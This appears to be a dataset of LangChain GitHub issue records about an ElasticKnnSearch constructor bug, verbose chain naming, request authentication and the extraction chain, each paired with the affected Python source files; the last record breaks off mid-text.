response=cached_response, idx=0, ) ] with Session(langchain.llm_cache.engine) as session, session.begin(): for item in items: session.merge(item) assert llm(prompt) == cached_response def test_chat_model_caching() -> None: prompt: List[BaseMessage] = [HumanMessage(content="How are you?")] response = "Test response" cached_response = "Cached test response" cached_message = AIMessage(content=cached_response) llm = FakeListChatModel(responses=[response]) if langchain.llm_cache: langchain.llm_cache.update( prompt=dumps(prompt), llm_string=llm._get_llm_string(), return_val=[ChatGeneration(message=cached_message)], ) result = llm(prompt) assert isinstance(result, AIMessage) assert result.content == cached_response else: raise ValueError( "The cache not set. This should never happen, as the pytest fixture " "`set_cache_and_teardown` always sets the cache." 
) def test_chat_model_caching_params() -> None: prompt: List[BaseMessage] = [HumanMessage(content="How are you?")] response = "Test response" cached_response = "Cached test response" cached_message = AIMessage(content=cached_response) llm = FakeListChatModel(responses=[response]) if langchain.llm_cache: langchain.llm_cache.update( prompt=dumps(prompt), llm_string=llm._get_llm_string(functions=[]), return_val=[ChatGeneration(message=cached_message)], ) result = llm(prompt, functions=[]) assert isinstance(result, AIMessage) assert result.content == cached_response result_no_params = llm(prompt) assert isinstance(result_no_params, AIMessage) assert result_no_params.content == response else: raise ValueError( "The cache not set. This should never happen, as the pytest fixture " "`set_cache_and_teardown` always sets the cache." ) def create_llm_string(llm: Union[BaseLLM, BaseChatModel]) -> str: _dict: Dict = llm.dict() _dict["stop"] = None return str(sorted([(k, v) for k, v in _dict.items()]))
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
6198
Elasticsearch : ElasticKnnSearch.from_texts throws AttributeError
### System Info

Langchain version: 0.0.199
Python Version: Python 3.9.16
MacOS

@CodeDevNinja @dev2049

PR https://github.com/hwchase17/langchain/pull/5058 introduced a change to `ElasticVectorSearch.from_texts` which broke, kind of coincidentally, `ElasticKnnSearch.from_texts`.

I discovered this issue when running docs/modules/indexes/vectorstores/examples/elasticsearch.ipynb. I got to the following cell:

```python
# Test `add_texts` method
texts = ["Hello, world!", "Machine learning is fun.", "I love Python."]
knn_search.add_texts(texts)

# Test `from_texts` method
new_texts = ["This is a new text.", "Elasticsearch is powerful.", "Python is great for data analysis."]
knn_search.from_texts(new_texts, embeddings, elasticsearch_url=elasticsearch_url)
```

and it said:

```python
---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
Cell In[10], line 7
      5 # Test `from_texts` method
      6 new_texts = ["This is a new text.", "Elasticsearch is powerful.", "Python is great for data analysis."]
----> 7 knn_search.from_texts(new_texts, embeddings, elasticsearch_url=elasticsearch_url)

File ~/dev/github/langchain/langchain/vectorstores/elastic_vector_search.py:296, in ElasticVectorSearch.from_texts(cls, texts, embedding, metadatas, elasticsearch_url, index_name, refresh_indices, **kwargs)
    293 index_name = index_name or uuid.uuid4().hex
    294 vectorsearch = cls(
    295     elasticsearch_url, index_name, embedding, **kwargs)
--> 296 vectorsearch.add_texts(
    297     texts, metadatas=metadatas, refresh_indices=refresh_indices
    298 )
    299 return vectorsearch

File ~/dev/github/langchain/langchain/vectorstores/elastic_vector_search.py:183, in ElasticVectorSearch.add_texts(self, texts, metadatas, refresh_indices, **kwargs)
    181 requests = []
    182 ids = []
--> 183 embeddings = self.embedding.embed_documents(list(texts))
    184 dim = len(embeddings[0])
    185 mapping = _default_text_mapping(dim)

AttributeError: 'str' object has no attribute 'embed_documents'
```

which is a pretty weird error. This is because https://github.com/cdiddy77/langchain/blob/e74733ab9e5e307fd828ea600ea929a1cb24320f/langchain/vectorstores/elastic_vector_search.py#L294 invokes the `__init__` of the calling class, in this case `ElasticKnnSearch`, which takes parameters in a very different order. This calling of the wrong `__init__` was always present, but the PR above added a subsequent call to `add_texts`, which is where the bogus embedding is referenced, causing the exception.

### Who can help?

_No response_

### Information

- [X] The official example notebooks/scripts
- [ ] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

Steps to repro:

1. Open docs/modules/indexes/vectorstores/examples/elasticsearch.ipynb
2. Modify as appropriate with elasticsearch_url, and further down, model_id, dims, cloud_id, username, password of the Elastic Cloud deployment
3. Run until the cell below "Test adding vectors"

### Expected behavior

Should not throw an exception.
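A hypothetical workaround sketch (not the merged fix): give `ElasticKnnSearch` a `from_texts` that matches its own `__init__` signature, so the inherited `ElasticVectorSearch.from_texts` no longer passes `elasticsearch_url` into the wrong positional slot. The subclass name and argument handling are illustrative:

```python
# Hypothetical workaround: override from_texts to call
# ElasticKnnSearch.__init__(index_name, embedding, ...) instead of the
# inherited cls(elasticsearch_url, index_name, embedding) call.
import uuid
from typing import Any, List, Optional

from langchain.embeddings.base import Embeddings
from langchain.vectorstores.elastic_vector_search import ElasticKnnSearch


class PatchedElasticKnnSearch(ElasticKnnSearch):
    @classmethod
    def from_texts(
        cls,
        texts: List[str],
        embedding: Embeddings,
        metadatas: Optional[List[dict]] = None,
        index_name: Optional[str] = None,
        # kwargs carry es_connection, or es_cloud_id/es_user/es_password.
        **kwargs: Any,
    ) -> "PatchedElasticKnnSearch":
        index_name = index_name or uuid.uuid4().hex
        store = cls(index_name, embedding, **kwargs)
        store.add_texts(texts, metadatas=metadatas)
        return store
```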
https://github.com/langchain-ai/langchain/issues/6198
https://github.com/langchain-ai/langchain/pull/6199
854f3fe9b1ca1c3e097cb0ccd55d1406e9c04406
574698a5fb2adbc4b6eb20ffe11a949a4f3b0371
"2023-06-15T04:45:12Z"
python
"2023-07-13T23:55:20Z"
langchain/vectorstores/elastic_vector_search.py
"""Wrapper around Elasticsearch vector database.""" from __future__ import annotations import uuid from abc import ABC from typing import ( TYPE_CHECKING, Any, Dict, Iterable, List, Mapping, Optional, Tuple, Union, ) from langchain.docstore.document import Document from langchain.embeddings.base import Embeddings from langchain.utils import get_from_env from langchain.vectorstores.base import VectorStore if TYPE_CHECKING: from elasticsearch import Elasticsearch def _default_text_mapping(dim: int) -> Dict: return { "properties": { "text": {"type": "text"}, "vector": {"type": "dense_vector", "dims": dim}, } } def _default_script_query(query_vector: List[float], filter: Optional[dict]) -> Dict: if filter: ((key, value),) = filter.items() filter = {"match": {f"metadata.{key}.keyword": f"{value}"}} else: filter = {"match_all": {}} return { "script_score": { "query": filter, "script": { "source": "cosineSimilarity(params.query_vector, 'vector') + 1.0", "params": {"query_vector": query_vector}, }, } } # ElasticVectorSearch is a concrete implementation of the abstract base class # VectorStore, which defines a common interface for all vector database # implementations. By inheriting from the ABC class, ElasticVectorSearch can be # defined as an abstract base class itself, allowing the creation of subclasses with # their own specific implementations. If you plan to subclass ElasticVectorSearch, # you can inherit from it and define your own implementation of the necessary methods # and attributes. class ElasticVectorSearch(VectorStore, ABC): """Wrapper around Elasticsearch as a vector database. To connect to an Elasticsearch instance that does not require login credentials, pass the Elasticsearch URL and index name along with the embedding object to the constructor. Example: .. code-block:: python from langchain import ElasticVectorSearch from langchain.embeddings import OpenAIEmbeddings embedding = OpenAIEmbeddings() elastic_vector_search = ElasticVectorSearch( elasticsearch_url="http://localhost:9200", index_name="test_index", embedding=embedding ) To connect to an Elasticsearch instance that requires login credentials, including Elastic Cloud, use the Elasticsearch URL format https://username:password@es_host:9243. For example, to connect to Elastic Cloud, create the Elasticsearch URL with the required authentication details and pass it to the ElasticVectorSearch constructor as the named parameter elasticsearch_url. You can obtain your Elastic Cloud URL and login credentials by logging in to the Elastic Cloud console at https://cloud.elastic.co, selecting your deployment, and navigating to the "Deployments" page. To obtain your Elastic Cloud password for the default "elastic" user: 1. Log in to the Elastic Cloud console at https://cloud.elastic.co 2. Go to "Security" > "Users" 3. Locate the "elastic" user and click "Edit" 4. Click "Reset password" 5. Follow the prompts to reset the password The format for Elastic Cloud URLs is https://username:password@cluster_id.region_id.gcp.cloud.es.io:9243. Example: .. code-block:: python from langchain import ElasticVectorSearch from langchain.embeddings import OpenAIEmbeddings embedding = OpenAIEmbeddings() elastic_host = "cluster_id.region_id.gcp.cloud.es.io" elasticsearch_url = f"https://username:password@{elastic_host}:9243" elastic_vector_search = ElasticVectorSearch( elasticsearch_url=elasticsearch_url, index_name="test_index", embedding=embedding ) Args: elasticsearch_url (str): The URL for the Elasticsearch instance. 
index_name (str): The name of the Elasticsearch index for the embeddings. embedding (Embeddings): An object that provides the ability to embed text. It should be an instance of a class that subclasses the Embeddings abstract base class, such as OpenAIEmbeddings() Raises: ValueError: If the elasticsearch python package is not installed. """ def __init__( self, elasticsearch_url: str, index_name: str, embedding: Embeddings, *, ssl_verify: Optional[Dict[str, Any]] = None, ): """Initialize with necessary components.""" try: import elasticsearch except ImportError: raise ImportError( "Could not import elasticsearch python package. " "Please install it with `pip install elasticsearch`." ) self.embedding = embedding self.index_name = index_name _ssl_verify = ssl_verify or {} try: self.client = elasticsearch.Elasticsearch(elasticsearch_url, **_ssl_verify) except ValueError as e: raise ValueError( f"Your elasticsearch client string is mis-formatted. Got error: {e} " ) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, refresh_indices: bool = True, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. ids: Optional list of unique IDs. refresh_indices: bool to refresh ElasticSearch indices Returns: List of ids from adding the texts into the vectorstore. """ try: from elasticsearch.exceptions import NotFoundError from elasticsearch.helpers import bulk except ImportError: raise ImportError( "Could not import elasticsearch python package. " "Please install it with `pip install elasticsearch`." ) requests = [] ids = ids or [str(uuid.uuid4()) for _ in texts] embeddings = self.embedding.embed_documents(list(texts)) dim = len(embeddings[0]) mapping = _default_text_mapping(dim) # check to see if the index already exists try: self.client.indices.get(index=self.index_name) except NotFoundError: # TODO would be nice to create index before embedding, # just to save expensive steps for last self.create_index(self.client, self.index_name, mapping) for i, text in enumerate(texts): metadata = metadatas[i] if metadatas else {} request = { "_op_type": "index", "_index": self.index_name, "vector": embeddings[i], "text": text, "metadata": metadata, "_id": ids[i], } requests.append(request) bulk(self.client, requests) if refresh_indices: self.client.indices.refresh(index=self.index_name) return ids def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any ) -> List[Document]: """Return docs most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. Returns: List of Documents most similar to the query. """ docs_and_scores = self.similarity_search_with_score(query, k, filter=filter) documents = [d[0] for d in docs_and_scores] return documents def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any ) -> List[Tuple[Document, float]]: """Return docs most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. Returns: List of Documents most similar to the query. 
""" embedding = self.embedding.embed_query(query) script_query = _default_script_query(embedding, filter) response = self.client_search( self.client, self.index_name, script_query, size=k ) hits = [hit for hit in response["hits"]["hits"]] docs_and_scores = [ ( Document( page_content=hit["_source"]["text"], metadata=hit["_source"]["metadata"], ), hit["_score"], ) for hit in hits ] return docs_and_scores @classmethod def from_texts( cls, texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, elasticsearch_url: Optional[str] = None, index_name: Optional[str] = None, refresh_indices: bool = True, **kwargs: Any, ) -> ElasticVectorSearch: """Construct ElasticVectorSearch wrapper from raw documents. This is a user-friendly interface that: 1. Embeds documents. 2. Creates a new index for the embeddings in the Elasticsearch instance. 3. Adds the documents to the newly created Elasticsearch index. This is intended to be a quick way to get started. Example: .. code-block:: python from langchain import ElasticVectorSearch from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() elastic_vector_search = ElasticVectorSearch.from_texts( texts, embeddings, elasticsearch_url="http://localhost:9200" ) """ elasticsearch_url = elasticsearch_url or get_from_env( "elasticsearch_url", "ELASTICSEARCH_URL" ) index_name = index_name or uuid.uuid4().hex vectorsearch = cls(elasticsearch_url, index_name, embedding, **kwargs) vectorsearch.add_texts( texts, metadatas=metadatas, ids=ids, refresh_indices=refresh_indices ) return vectorsearch def create_index(self, client: Any, index_name: str, mapping: Dict) -> None: version_num = client.info()["version"]["number"][0] version_num = int(version_num) if version_num >= 8: client.indices.create(index=index_name, mappings=mapping) else: client.indices.create(index=index_name, body={"mappings": mapping}) def client_search( self, client: Any, index_name: str, script_query: Dict, size: int ) -> Any: version_num = client.info()["version"]["number"][0] version_num = int(version_num) if version_num >= 8: response = client.search(index=index_name, query=script_query, size=size) else: response = client.search( index=index_name, body={"query": script_query, "size": size} ) return response def delete(self, ids: Optional[List[str]] = None, **kwargs: Any) -> None: """Delete by vector IDs. Args: ids: List of ids to delete. """ if ids is None: raise ValueError("No ids provided to delete.") # TODO: Check if this can be done in bulk for id in ids: self.client.delete(index=self.index_name, id=id) class ElasticKnnSearch(ElasticVectorSearch): """ A class for performing k-Nearest Neighbors (k-NN) search on an Elasticsearch index. The class is designed for a text search scenario where documents are text strings and their embeddings are vector representations of those strings. """ def __init__( self, index_name: str, embedding: Embeddings, es_connection: Optional["Elasticsearch"] = None, es_cloud_id: Optional[str] = None, es_user: Optional[str] = None, es_password: Optional[str] = None, vector_query_field: Optional[str] = "vector", query_field: Optional[str] = "text", ): """ Initializes an instance of the ElasticKnnSearch class and sets up the Elasticsearch client. Args: index_name: The name of the Elasticsearch index. embedding: An instance of the Embeddings class, used to generate vector representations of text strings. es_connection: An existing Elasticsearch connection. 
es_cloud_id: The Cloud ID of the Elasticsearch instance. Required if creating a new connection. es_user: The username for the Elasticsearch instance. Required if creating a new connection. es_password: The password for the Elasticsearch instance. Required if creating a new connection. """ try: import elasticsearch except ImportError: raise ImportError( "Could not import elasticsearch python package. " "Please install it with `pip install elasticsearch`." ) self.embedding = embedding self.index_name = index_name self.query_field = query_field self.vector_query_field = vector_query_field # If a pre-existing Elasticsearch connection is provided, use it. if es_connection is not None: self.client = es_connection else: # If credentials for a new Elasticsearch connection are provided, # create a new connection. if es_cloud_id and es_user and es_password: self.client = elasticsearch.Elasticsearch( cloud_id=es_cloud_id, basic_auth=(es_user, es_password) ) else: raise ValueError( """Either provide a pre-existing Elasticsearch connection, \ or valid credentials for creating a new connection.""" ) @staticmethod def _default_knn_mapping(dims: int) -> Dict: """Generates a default index mapping for kNN search.""" return { "properties": { "text": {"type": "text"}, "vector": { "type": "dense_vector", "dims": dims, "index": True, "similarity": "dot_product", }, } } def _default_knn_query( self, query_vector: Optional[List[float]] = None, query: Optional[str] = None, model_id: Optional[str] = None, k: Optional[int] = 10, num_candidates: Optional[int] = 10, ) -> Dict: knn: Dict = { "field": self.vector_query_field, "k": k, "num_candidates": num_candidates, } # Case 1: `query_vector` is provided, but not `model_id` -> use query_vector if query_vector and not model_id: knn["query_vector"] = query_vector # Case 2: `query` and `model_id` are provided, -> use query_vector_builder elif query and model_id: knn["query_vector_builder"] = { "text_embedding": { "model_id": model_id, # use 'model_id' argument "model_text": query, # use 'query' argument } } else: raise ValueError( "Either `query_vector` or `model_id` must be provided, but not both." ) return knn def knn_search( self, query: Optional[str] = None, k: Optional[int] = 10, query_vector: Optional[List[float]] = None, model_id: Optional[str] = None, size: Optional[int] = 10, source: Optional[bool] = True, fields: Optional[ Union[List[Mapping[str, Any]], Tuple[Mapping[str, Any], ...], None] ] = None, ) -> Dict: """ Performs a k-nearest neighbor (k-NN) search on the Elasticsearch index. The search can be conducted using either a raw query vector or a model ID. The method first generates the body of the search query, which can be interpreted by Elasticsearch. It then performs the k-NN search on the Elasticsearch index and returns the results. Args: query: The query or queries to be used for the search. Required if `query_vector` is not provided. k: The number of nearest neighbors to return. Defaults to 10. query_vector: The query vector to be used for the search. Required if `query` is not provided. model_id: The ID of the model to use for generating the query vector, if `query` is provided. size: The number of search hits to return. Defaults to 10. source: Whether to include the source of each hit in the results. fields: The fields to include in the source of each hit. If None, all fields are included. vector_query_field: Field name to use in knn search if not default 'vector' Returns: The search results. 
Raises: ValueError: If neither `query_vector` nor `model_id` is provided, or if both are provided. """ knn_query_body = self._default_knn_query( query_vector=query_vector, query=query, model_id=model_id, k=k ) # Perform the kNN search on the Elasticsearch index and return the results. res = self.client.search( index=self.index_name, knn=knn_query_body, size=size, source=source, fields=fields, ) return dict(res) def knn_hybrid_search( self, query: Optional[str] = None, k: Optional[int] = 10, query_vector: Optional[List[float]] = None, model_id: Optional[str] = None, size: Optional[int] = 10, source: Optional[bool] = True, knn_boost: Optional[float] = 0.9, query_boost: Optional[float] = 0.1, fields: Optional[ Union[List[Mapping[str, Any]], Tuple[Mapping[str, Any], ...], None] ] = None, ) -> Dict[Any, Any]: """Performs a hybrid k-nearest neighbor (k-NN) and text-based search on the Elasticsearch index. The search can be conducted using either a raw query vector or a model ID. The method first generates the body of the k-NN search query and the text-based query, which can be interpreted by Elasticsearch. It then performs the hybrid search on the Elasticsearch index and returns the results. Args: query: The query or queries to be used for the search. Required if `query_vector` is not provided. k: The number of nearest neighbors to return. Defaults to 10. query_vector: The query vector to be used for the search. Required if `query` is not provided. model_id: The ID of the model to use for generating the query vector, if `query` is provided. size: The number of search hits to return. Defaults to 10. source: Whether to include the source of each hit in the results. knn_boost: The boost factor for the k-NN part of the search. query_boost: The boost factor for the text-based part of the search. fields The fields to include in the source of each hit. If None, all fields are included. Defaults to None. vector_query_field: Field name to use in knn search if not default 'vector' query_field: Field name to use in search if not default 'text' Returns: The search results. Raises: ValueError: If neither `query_vector` nor `model_id` is provided, or if both are provided. """ knn_query_body = self._default_knn_query( query_vector=query_vector, query=query, model_id=model_id, k=k ) # Modify the knn_query_body to add a "boost" parameter knn_query_body["boost"] = knn_boost # Generate the body of the standard Elasticsearch query match_query_body = { "match": {self.query_field: {"query": query, "boost": query_boost}} } # Perform the hybrid search on the Elasticsearch index and return the results. res = self.client.search( index=self.index_name, query=match_query_body, knn=knn_query_body, fields=fields, size=size, source=source, ) return dict(res)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7524
Specific name of the current chain is not displayed
### System Info

LangChain v0.0.229, Python v3.10.12, Ubuntu 20.04.2 LTS

### Who can help?

@hwchase17 @agola11

### Information

- [ ] The official example notebooks/scripts
- [X] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [X] Callbacks/Tracing
- [ ] Async

### Reproduction

I am encountering an issue where the specific name of the current chain is not being displayed in the console output, even though I have set `verbose=True` in the MultiPromptChain and other Chains. When the program enters a new chain, it only prints "Entering new chain..." without specifying the name of the chain. This makes it difficult to debug and understand which chain is currently being used. Could you please look into this issue and provide a way to display the name of the current chain in the console output? Thank you.

The output could be:

```
> Entering new chain...

> Entering new chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
  warnings.warn(

> Finished chain.
math: {'input': 'What is the derivative of a function?'}

> Entering new chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.

Here is a question:
What is the derivative of a function?

> Finished chain.

> Finished chain.
```

### Expected behavior

```
> Entering new MultiPromptChain chain...

> Entering new LLMRouterChain chain...
lib/python3.10/site-packages/langchain/chains/llm.py:275: UserWarning: The predict_and_parse method is deprecated, instead pass an output parser directly to LLMChain.
  warnings.warn(

> Finished chain.
math: {'input': 'What is the derivative of a function?'}

> Entering new LLMChain[math] chain...
Prompt after formatting:
You are a very good mathematician. You are great at answering math questions. \nYou are so good because you are able to break down hard problems into their component parts, \nanswer the component parts, and then put them together to answer the broader question.

Here is a question:
What is the derivative of a function?

> Finished chain.

> Finished chain.
```
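Until the verbose output includes the class name, a custom callback can surface it, mirroring what `FileCallbackHandler` (this row's updated file, shown below) already does with `serialized["name"]`. A hypothetical sketch; the fallback to the `"id"` path is an assumption about langchain's serialization payload at this version:

```python
# Hypothetical workaround (not the merged fix): print the concrete chain name
# from the serialized payload on chain start.
from typing import Any, Dict

from langchain.callbacks.base import BaseCallbackHandler


class NamedChainLogger(BaseCallbackHandler):
    def on_chain_start(
        self, serialized: Dict[str, Any], inputs: Dict[str, Any], **kwargs: Any
    ) -> None:
        # Assumption: the payload carries either a "name" key or an "id" path
        # like ["langchain", "chains", "llm", "LLMChain"].
        name = serialized.get("name") or serialized.get("id", ["<unknown>"])[-1]
        print(f"\n> Entering new {name} chain...")


# Usage (illustrative): chain({"input": "..."}, callbacks=[NamedChainLogger()])
```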
https://github.com/langchain-ai/langchain/issues/7524
https://github.com/langchain-ai/langchain/pull/7687
3874bb256e09d377032ae54b1592ca3dd7cf9e4d
af6d333147db0af7d558a4a66d6c2752b6027204
"2023-07-11T08:28:40Z"
python
"2023-07-14T02:39:21Z"
langchain/callbacks/file.py
"""Callback Handler that writes to a file.""" from typing import Any, Dict, Optional, TextIO, cast from langchain.callbacks.base import BaseCallbackHandler from langchain.input import print_text from langchain.schema import AgentAction, AgentFinish class FileCallbackHandler(BaseCallbackHandler): """Callback Handler that writes to a file.""" def __init__( self, filename: str, mode: str = "a", color: Optional[str] = None ) -> None: """Initialize callback handler.""" self.file = cast(TextIO, open(filename, mode)) self.color = color def __del__(self) -> None: """Destructor to cleanup when done.""" self.file.close() def on_chain_start( self, serialized: Dict[str, Any], inputs: Dict[str, Any], **kwargs: Any ) -> None: """Print out that we are entering a chain.""" class_name = serialized["name"] print_text( f"\n\n\033[1m> Entering new {class_name} chain...\033[0m", end="\n", file=self.file, ) def on_chain_end(self, outputs: Dict[str, Any], **kwargs: Any) -> None: """Print out that we finished a chain.""" print_text("\n\033[1m> Finished chain.\033[0m", end="\n", file=self.file) def on_agent_action( self, action: AgentAction, color: Optional[str] = None, **kwargs: Any ) -> Any: """Run on agent action.""" print_text(action.log, color=color or self.color, file=self.file) def on_tool_end( self, output: str, color: Optional[str] = None, observation_prefix: Optional[str] = None, llm_prefix: Optional[str] = None, **kwargs: Any, ) -> None: """If not the final action, print out observation.""" if observation_prefix is not None: print_text(f"\n{observation_prefix}", file=self.file) print_text(output, color=color or self.color, file=self.file) if llm_prefix is not None: print_text(f"\n{llm_prefix}", file=self.file) def on_text( self, text: str, color: Optional[str] = None, end: str = "", **kwargs: Any ) -> None: """Run when agent ends.""" print_text(text, color=color or self.color, end=end, file=self.file) def on_agent_finish( self, finish: AgentFinish, color: Optional[str] = None, **kwargs: Any ) -> None: """Run on agent end.""" print_text(finish.log, color=color or self.color, end="\n", file=self.file)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,542
Issue: Passing auth object to LLMRequestsChain
### Issue you'd like to raise. Accessing many corporate resources requires special authentication, e.g. Kerberos. The `requests` library supports passing an auth object, e.g. `requests.get(url, auth=HttpNegotiateAuth(), verify=False)` to use SSPI. We're able to pass a `requests_wrapper` to `LLMRequestsChain`, but it only allows changing headers, not the actual GET method that is used. ### Suggestion: Allow more generic wrappers to be passed? Allow passing a requests-compatible auth object?
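As a stopgap, one hedged workaround sketch is to subclass the wrapper and inject the auth object into every request; `HttpNegotiateAuth` comes from the third-party `requests-negotiate-sspi` package and its use here is an assumption:

```python
# Hypothetical workaround: a wrapper subclass that injects a requests-compatible
# auth object, since LLMRequestsChain calls get(url) without extra kwargs.
from typing import Any

from requests_negotiate_sspi import HttpNegotiateAuth  # assumed third-party dep

from langchain.requests import TextRequestsWrapper


class AuthTextRequestsWrapper(TextRequestsWrapper):
    """TextRequestsWrapper that authenticates every GET via SSPI."""

    def get(self, url: str, **kwargs: Any) -> str:
        kwargs.setdefault("auth", HttpNegotiateAuth())
        kwargs.setdefault("verify", False)
        # The underlying Requests.get forwards **kwargs to requests.get,
        # so the auth object reaches the HTTP call.
        return super().get(url, **kwargs)
```

An instance of this subclass could then be passed as `requests_wrapper` to `LLMRequestsChain` without changing the chain itself.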
https://github.com/langchain-ai/langchain/issues/7542
https://github.com/langchain-ai/langchain/pull/7701
1e40427755f3034c5c411c1d0a921cdb3e13849d
663b0933e488383e6a9bc2a04b4b1cf866a8ea94
"2023-07-11T13:59:38Z"
python
"2023-07-14T12:38:24Z"
langchain/requests.py
"""Lightweight wrapper around requests library, with async support.""" from contextlib import asynccontextmanager from typing import Any, AsyncGenerator, Dict, Optional import aiohttp import requests from pydantic import BaseModel, Extra class Requests(BaseModel): """Wrapper around requests to handle auth and async. The main purpose of this wrapper is to handle authentication (by saving headers) and enable easy async methods on the same base object. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True def get(self, url: str, **kwargs: Any) -> requests.Response: """GET the URL and return the text.""" return requests.get(url, headers=self.headers, **kwargs) def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """POST to the URL and return the text.""" return requests.post(url, json=data, headers=self.headers, **kwargs) def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PATCH the URL and return the text.""" return requests.patch(url, json=data, headers=self.headers, **kwargs) def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PUT the URL and return the text.""" return requests.put(url, json=data, headers=self.headers, **kwargs) def delete(self, url: str, **kwargs: Any) -> requests.Response: """DELETE the URL and return the text.""" return requests.delete(url, headers=self.headers, **kwargs) @asynccontextmanager async def _arequest( self, method: str, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """Make an async request.""" if not self.aiosession: async with aiohttp.ClientSession() as session: async with session.request( method, url, headers=self.headers, **kwargs ) as response: yield response else: async with self.aiosession.request( method, url, headers=self.headers, **kwargs ) as response: yield response @asynccontextmanager async def aget( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """GET the URL and return the text asynchronously.""" async with self._arequest("GET", url, **kwargs) as response: yield response @asynccontextmanager async def apost( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """POST to the URL and return the text asynchronously.""" async with self._arequest("POST", url, json=data, **kwargs) as response: yield response @asynccontextmanager async def apatch( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PATCH the URL and return the text asynchronously.""" async with self._arequest("PATCH", url, json=data, **kwargs) as response: yield response @asynccontextmanager async def aput( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PUT the URL and return the text asynchronously.""" async with self._arequest("PUT", url, json=data, **kwargs) as response: yield response @asynccontextmanager async def adelete( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """DELETE the URL and return the text asynchronously.""" async with self._arequest("DELETE", url, **kwargs) as response: yield response class TextRequestsWrapper(BaseModel): """Lightweight wrapper around requests library. The main purpose of this wrapper is to always return a text output. 
""" headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def requests(self) -> Requests: return Requests(headers=self.headers, aiosession=self.aiosession) def get(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text.""" return self.requests.get(url, **kwargs).text def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text.""" return self.requests.post(url, data, **kwargs).text def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text.""" return self.requests.patch(url, data, **kwargs).text def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text.""" return self.requests.put(url, data, **kwargs).text def delete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text.""" return self.requests.delete(url, **kwargs).text async def aget(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text asynchronously.""" async with self.requests.aget(url, **kwargs) as response: return await response.text() async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text asynchronously.""" async with self.requests.apost(url, data, **kwargs) as response: return await response.text() async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text asynchronously.""" async with self.requests.apatch(url, data, **kwargs) as response: return await response.text() async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text asynchronously.""" async with self.requests.aput(url, data, **kwargs) as response: return await response.text() async def adelete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text asynchronously.""" async with self.requests.adelete(url, **kwargs) as response: return await response.text() # For backwards compatibility RequestsWrapper = TextRequestsWrapper
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,982
TypeError: create_extraction_chain() got an unexpected keyword argument 'verbose'
### Feature request Almost all the chains offered in the LangChain framework support a verbose option, which helps developers understand what prompt is being applied under the hood and plan their work accordingly. It immensely helps while debugging. `create_extraction_chain` is a very helpful chain, and I found that it does not accept a verbose attribute. ### Motivation For many developers who are just following the official LangChain documentation and not looking at the code used under the hood, this error will sound odd. Supporting this attribute will keep things consistent and improve the debugging experience for this chain. ### Your contribution I can raise the PR for this ![Screenshot 2023-07-20 at 12 34 55 PM](https://github.com/hwchase17/langchain/assets/8801972/18b248df-1a7c-49cf-a9b1-3101e6928631)
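To illustrate the report, a sketch of the failing call and a possible workaround; the llm and schema are assumptions, and whether mutating `verbose` after construction works depends on the chain's pydantic config:

```python
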